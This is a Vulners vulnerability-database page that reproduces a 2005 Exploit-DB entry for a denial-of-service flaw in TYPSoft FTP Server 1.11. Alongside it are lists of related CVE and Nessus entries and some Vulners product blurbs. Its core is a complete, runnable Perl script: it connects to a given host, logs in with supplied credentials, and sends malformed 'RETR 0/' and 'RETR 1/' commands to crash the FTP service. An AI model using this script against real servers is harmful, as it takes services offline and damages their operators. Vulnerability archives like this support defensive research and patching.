Lucene search
+L

TYPSoft FTP Server 1.11 - 'RETR' Denial of Service

🗓️ 14 Oct 2005 00:00:00Reported by woodType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 51 Views

TYPSoft FTP Server 1.11 'RETR' Denial of Servic

Related
Code
ReporterTitlePublishedViews
Family
zdt
zdt
TYPSoft FTP Server (v 1.10) RETR CMD Denial Of Service
29 Dec 201000:00
zdt
nessus
Tenable Nessus
TYPSoft FTP Server Multiple DoS
9 Sep 200400:00
nessus
nessus
Tenable Nessus
TYPSoft FTP Server <= 1.10 Multiple DoS
14 Oct 200500:00
nessus
nessus
Tenable Nessus
TYPSoft FTP Server Malformed STOR / RETR Command DoS
21 Aug 200200:00
nessus
circl
Circl
CVE-2005-3294
14 May 201000:00
circl
cve
CVE
CVE-2001-1156
15 Mar 200205:00
cve
cve
CVE
CVE-2005-3294
23 Oct 200504:00
cve
cvelist
Cvelist
CVE-2001-1156
15 Mar 200205:00
cvelist
cvelist
Cvelist
CVE-2005-3294
23 Oct 200504:00
cvelist
exploitdb
Exploit DB
TYPSoft FTP Server 1.10 - 'RETR' Denial of Service (1)
14 May 201000:00
exploitdb
Rows per page
#!/usr/bin/perl

use IO::Socket;
use Socket;

print "\n-= TYPSoft FTP Server <= v1.11 DOS =-\n";
print "-= wood (at) Exploitlabs.com =-\n\n";

if($#ARGV < 2 | $#ARGV > 3) { die "usage: perl typsoft-1.11-DOS.pl <host> <user> <pass> [port]\n" };
if($#ARGV > 2) { $prt = $ARGV[3] } else { $prt = "21" };

$adr = $ARGV[0];
$usr = $ARGV[1];
$pas = $ARGV[2];
$err1 = "RETR 0";
$err2 = "RETR 1";


$remote = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr,
PeerPort=>$prt, Reuse=>1) or die "Error: cant connect to $adr:$prt\n";

$remote->autoflush(1);

print $remote "USER $usr\n" and print "1. Sending : USER $usr...\n" or die
"Error: cant send user\n";

print $remote "PASS $pas\n" and print "2. Sending : PASS $pas...\n" or die
"Error: cant send pass\n";

print $remote "$err1/\n" and print "3. Sending : ErrorCode 1...\n";
print $remote "$err2/\n" and print "4. Sending : ErrorCode 2...\n\n"or die
"Error: cant send error code\n";

print "Attack done. press any key to exit\n";
$bla= <STDIN>;
close $remote;

# milw0rm.com [2005-10-14]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Jun 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.07676
51